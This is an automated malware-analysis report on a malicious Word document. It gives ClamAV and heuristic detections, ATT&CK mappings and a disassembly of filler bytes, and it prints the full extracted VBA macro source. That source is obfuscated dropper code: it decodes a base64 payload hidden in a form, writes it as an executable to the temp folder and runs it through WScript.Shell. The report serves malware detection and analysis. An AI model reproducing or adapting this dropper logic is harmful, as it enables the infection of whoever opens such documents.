MALICIOUS
388
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of WScript.Shell and Shell() calls, suggesting the macro attempts to execute external commands or download additional payloads. The presence of heap spray and NOP sled patterns further indicates exploitation attempts.
Heuristics 11
-
ClamAV: Ole2.Macro.Agent-9858864-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim aestas As Integer Set distraction = CreateObject("WScript.Shell") utopianism distraction, scintilla -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim aestas As Integer Set distraction = CreateObject("WScript.Shell") utopianism distraction, scintilla -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
adjectitious = 41 + 101 - 57 - 84 bargeman = CallByName(dais, "Run", adjectitious, guineabissau) For grapnel = 17 To 66 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Public Sub AutoOpen() Dim appalachia As Integer -
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes found
Disassembly
Attempted x86 opcode disassembly00017317 41 inc ecx 00017318 41 inc ecx 00017319 41 inc ecx 0001731A 41 inc ecx 0001731B 41 inc ecx 0001731C 41 inc ecx 0001731D 41 inc ecx 0001731E 41 inc ecx 0001731F 41 inc ecx 00017320 41 inc ecx 00017321 41 inc ecx 00017322 41 inc ecx 00017323 41 inc ecx 00017324 41 inc ecx 00017325 41 inc ecx 00017326 41 inc ecx 00017327 41 inc ecx 00017328 41 inc ecx 00017329 41 inc ecx 0001732A 41 inc ecx 0001732B 41 inc ecx 0001732C 41 inc ecx 0001732D 41 inc ecx 0001732E 41 inc ecx 0001732F 41 inc ecx 00017330 41 inc ecx 00017331 41 inc ecx 00017332 41 inc ecx 00017333 41 inc ecx 00017334 41 inc ecx 00017335 41 inc ecx 00017336 41 inc ecx 00017337 41 inc ecx 00017338 41 inc ecx 00017339 41 inc ecx 0001733A 41 inc ecx 0001733B 41 inc ecx 0001733C 41 inc ecx 0001733D 41 inc ecx 0001733E 41 inc ecx 0001733F 41 inc ecx 00017340 41 inc ecx 00017341 41 inc ecx 00017342 41 inc ecx 00017343 41 inc ecx 00017344 41 inc ecx 00017345 41 inc ecx 00017346 41 inc ecx 00017347 41 inc ecx 00017348 41 inc ecx 00017349 41 inc ecx 0001734A 41 inc ecx 0001734B 41 inc ecx 0001734C 41 inc ecx 0001734D 41 inc ecx 0001734E 41 inc ecx 0001734F 41 inc ecx 00017350 41 inc ecx 00017351 41 inc ecx 00017352 41 inc ecx 00017353 41 inc ecx 00017354 41 inc ecx 00017355 41 inc ecx 00017356 41 inc ecx 00017357 41 inc ecx 00017358 41 inc ecx 00017359 41 inc ecx 0001735A 41 inc ecx 0001735B 41 inc ecx 0001735C 41 inc ecx 0001735D 41 inc ecx 0001735E 41 inc ecx 0001735F 41 inc ecx 00017360 41 inc ecx 00017361 41 inc ecx 00017362 41 inc ecx 00017363 41 inc ecx 00017364 41 inc ecx 00017365 41 inc ecx 00017366 41 inc ecx 00017367 41 inc ecx 00017368 41 inc ecx 00017369 41 inc ecx 0001736A 41 inc ecx 0001736B 41 inc ecx 0001736C 41 inc ecx 0001736D 41 inc ecx 0001736E 41 inc ecx 0001736F 41 inc ecx 00017370 41 inc ecx 00017371 41 inc ecx 00017372 41 inc ecx 00017373 41 inc ecx 00017374 41 inc ecx 00017375 41 inc ecx 00017376 41 inc ecx
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x41 bytes
Disassembly
Attempted x86 opcode disassembly0001703D 41 inc ecx 0001703E 41 inc ecx 0001703F 41 inc ecx 00017040 41 inc ecx 00017041 41 inc ecx 00017042 41 inc ecx 00017043 41 inc ecx 00017044 41 inc ecx 00017045 41 inc ecx 00017046 41 inc ecx 00017047 41 inc ecx 00017048 41 inc ecx 00017049 41 inc ecx 0001704A 41 inc ecx 0001704B 41 inc ecx 0001704C 41 inc ecx 0001704D 41 inc ecx 0001704E 41 inc ecx 0001704F 41 inc ecx 00017050 41 inc ecx 00017051 41 inc ecx 00017052 41 inc ecx 00017053 41 inc ecx 00017054 41 inc ecx 00017055 41 inc ecx 00017056 41 inc ecx 00017057 41 inc ecx 00017058 41 inc ecx 00017059 41 inc ecx 0001705A 41 inc ecx 0001705B 41 inc ecx 0001705C 41 inc ecx 0001705D 41 inc ecx 0001705E 41 inc ecx 0001705F 41 inc ecx 00017060 41 inc ecx 00017061 41 inc ecx 00017062 41 inc ecx 00017063 41 inc ecx 00017064 41 inc ecx 00017065 41 inc ecx 00017066 41 inc ecx 00017067 41 inc ecx 00017068 41 inc ecx 00017069 41 inc ecx 0001706A 41 inc ecx 0001706B 41 inc ecx 0001706C 7341 jae 0x170af 0001706E 41 inc ecx 0001706F 41 inc ecx 00017070 41 inc ecx 00017071 41 inc ecx 00017072 3466 xor al, 0x66 00017074 7567 jne 0x170dd 00017076 3441 xor al, 0x41 00017078 7441 je 0x170bb 0001707A 6e outsb dx, byte ptr [esi] 0001707B 4e dec esi 0001707C 49 dec ecx 0001707D 626742 bound esp, qword ptr [edi + 0x42] 00017080 54 push esp 00017081 4d dec ebp 00017082 306856 xor byte ptr [eax + 0x56], ch 00017085 47 inc edi 00017086 6870637942 push 0x42796370 0001708B 7763 ja 0x170f0 0001708D 6d insd dword ptr es:[edi], dx 0001708E 396e63 cmp dword ptr [esi + 0x63], ebp 00017091 6d insd dword ptr es:[edi], dx 00017092 46 inc esi 00017093 7449 je 0x170de 00017095 47 inc edi 00017096 4e dec esi 00017097 68626d3576 push 0x76356d62 0001709C 64 .byte 0x64
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7795 bytes |
SHA-256: 01d06a23541e40aee243c6230b8085fbe6e0297e4d4b04f8ab8d5d50da23af01 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub FormatTablesIf()
Dim oTb As Table
For Each oTb In ActiveDocument.Tables
If oTb.Columns.Count < 5 Then
oTb.Style = "Light Shading - Accent 4"
oTb.Rows(1).Range.Style = ActiveDocument.Styles("Heading 2")
oTb.AutoFitBehavior (wdAutoFitFixed)
oTb.Rows.Alignment = wdAlignRowCenter
oTb.Columns.PreferredWidth = InchesToPoints(0.6)
Else
oTb.Style = "Medium List 2 - Accent 4"
oTb.Rows(1).Range.Style = ActiveDocument.Styles("Heading 4")
End If
Next oTb
End Sub
Public Sub AutoOpen()
Dim appalachia As Integer
Dim dabri As Variant
Dim re As Integer
Dim aigulet As Integer
re = Sin(21)
If re = 54 + 26 + 122 + 36323 Then
FormatTablesIf
Else
Dim aggrandize As Integer
Enter = theta.Width
session = 85
sauerbraten = 88
If session + sauerbraten < 46 Then
piercingly = Mid("graviscogust", 7, 2) + "nceitedly"
Else
sauerbraten = 48
End If
End If
End Sub
Sub FieldsCollectionObject()
Dim MyText As String
Dim MyRange As Object
Set MyRange = Selection.Range
MyText = "<Replace this with your text>"
End Sub
Attribute VB_Name = "alnaschar"
Public Sub autoimmune(ByRef abstemious, metaphorically, atticus)
Dim letup As Long
Dim inappreciable() As Byte
Dim unperceived As Byte
inappreciable = StrConv(metaphorically, vbFromUnicode)
Put #abstemious, , inappreciable
End Sub
Sub CheckSecLen()
Dim iSec As Integer
Dim oRng As Range
Dim iValue As Integer
With ActiveDocument
' go through each section (except for the last one)
For iSec = 1 To .Sections.Count - 1
' create a range object at the start of the section
Set oRng = .Sections(iSec).Range
oRng.Collapse wdCollapseStart
' insert a sectionpages field
.Fields.Add Range:=oRng, Type:=wdFieldSectionPages
' divide the sectionpages field by 2
' if it gives a zero as the remainder, then
' you have an even number of pages in the section,
' which is what you want with an odd section page break
If (.Sections(iSec).Range.Fields(1).Result Mod 2) <> 0 Then
' if you have an odd number of pages, then insert
' a page break before the section's section break
Set oRng = .Sections(iSec).Range
With oRng
.Collapse Direction:=wdCollapseEnd
.MoveEnd unit:=wdCharacter, Count:=-1
.InsertBreak Type:=wdPageBreak
End With
End If
' remove the sectionpages field that was added
.Sections(iSec).Range.Fields(1).Delete
Next iSec
End With
End Sub
Function coptic(assorted) As String
Dim disparity As String
Dim clipper As Long
Dim marrowbone As Integer
Dim finished As Long
Dim savara As Long
Dim fattened(63) As Long
Dim pinnace(63) As Long
Dim rerebrace() As Byte
Dim decomposition(63) As Long
Dim misconstrual(255) As Byte
Dim closest() As Byte
Dim presumable As Long
strictness = 113 + 16711567
sincere = 256
eriobotrya = 255
persuasibility = 126 - 68 + 65222
churlishness = 87 - 81 + 57
distrust = 258048
coluber = 262144
viola = 4032
dejection = 27 + 37
backbend = 91 - 76 + 4081
numero = 65536
dad = 18 - 63 + 16515117
clipper = Len(assorted)
If InStrRev(assorted, "==") Then
marrowbone = 2
ElseIf InStrRev(assorted, "=") Then
marrowbone = 1
End If
For clipper = 0 To 255
Select Case clipper
Case 65 To 90
misconstrual(clipper) = clipper - 65
Case 97 To 122
misconstrual(clipper) = clipper - 71
Case 48 To 57
misconstrual(clipper) = clipper + 4
Case 43
misconstrual(clipper) = 62
Case 47
misconstrual(clipper) = 63
End Select
Next clipper
For clipper = 0 To 63
fattened(clipper) = clipper * dejection
pinnace(clipper) = clipper * backbend
decomposition(clipper) = clipper * coluber
Next clipper
rerebrace = StrConv(assorted, vbFromUnicode)
ReDim closest((((UBound(rerebrace) + 1) \ 4) * 3) - 1)
For finished = 0 To UBound(rerebrace) Step 4
presumable = decomposition(misconstrual(rerebrace(finished))) + pinnace(misconstrual(rerebrace(finished + 1))) + _
fattened(misconstrual(rerebrace(finished + 2))) + misconstrual(rerebrace(finished + 3))
clipper = presumable And strictness
closest(savara) = clipper \ numero
clipper = presumable And persuasibility
closest(savara + 1) = clipper \ sincere
closest(savara + 2) = presumable And eriobotrya
savara = savara + 3
Next finished
disparity = StrConv(closest, vbUnicode)
If marrowbone Then disparity = Left$(disparity, Len(disparity) - marrowbone)
coptic = disparity
End Function
Sub disapprover()
Dim compatibility As Variant
buddhist = "cargador"
Dim longitudinally As String
Dim sadleria As Integer
Dim scintilla As String
established = 93
alamo = 79
If established + alamo < 51 Then
gink = "en" + Left("uredtammany", 4)
Else
alamo = 10
End If
longitudinally = chaldron
Dim bumptious As String
scintilla = longitudinally & "\sourdough.exe"
Dim rending As Byte
Dim oligocene
Dim cooperate
cooperate = FreeFile
Dim effects
effects = 0
Dim anabolism
Dim poolroom As Byte
oligocene = effects
Open scintilla For Binary Access Write As #cooperate
darkle = 78
boundshave = 92
If darkle + boundshave < 77 Then
obligated = StrReverse("an") + "val" + Lcase("") + Ucase("")
Else
boundshave = 85
End If
atheroma = theta.begrudge
Dim billowing As Byte
gammer = atheroma
dasymeter = coptic(gammer)
enshrine = Len(dasymeter)
oligocene = 1
Dim hirudo As Integer
Call alnaschar.autoimmune(cooperate, dasymeter, oligocene)
oligocene = oligocene + 6
honours = 51 - 49
Select Case honours
Case 1 To 7
meridian = Lcase("Te") + StrReverse("ress") + StrReverse("ea")
Case 8
meridian = "he" + Left("lminthfugacity", 6) + StrReverse("eugoga") + ""
Case 9
meridian = Mid("nelumbonaceaeasselowland", 14, 4) + Ucase("veRATI") + Lcase("ON")
End Select
Close #cooperate
For densely = 25 To 71
projectionist = Left("chtendency", 2) + Right("creweating", 6)
Next densely
Dim aestas As Integer
Set distraction = CreateObject("WScript.Shell")
utopianism distraction, scintilla
portfolio = 89
inuendo = 89
If portfolio + inuendo < 29 Then
thersites = "ic" + Lcase("tonYX")
Else
inuendo = 57
End If
End Sub
Sub utopianism(dais, guineabissau)
Dim hygrophytic As String
adjectitious = 41 + 101 - 57 - 84
bargeman = CallByName(dais, "Run", adjectitious, guineabissau)
For grapnel = 17 To 66
maxwell = Lcase("Cont") + "rollab" + Right("sphaerocarpalesle", 2) + ""
Next grapnel
End Sub
Function chaldron()
Dim literary As Long
Dim raze As Variant
its = Right("broomScripti", 7) + Left("ng.FileSystemObjectdorm", 19)
Dim firsthand As Integer
Set dismount = CreateObject(its)
horseson = 87
uncleanly = 75
If horseson + uncleanly < 39 Then
tick = "di" + "shra" + StrReverse("g")
Else
uncleanly = 82
End If
chaldron = dismount.GetSpecialFolder(98 - 52 - 19 - 25)
End Function
Attribute VB_Name = "theta"
Attribute VB_Base = "0{BED0B62E-9620-4845-97FE-244B0E3B715C}{324AC883-EAAB-4472-B475-EB00BD58F9AE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
alnaschar.disapprover
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.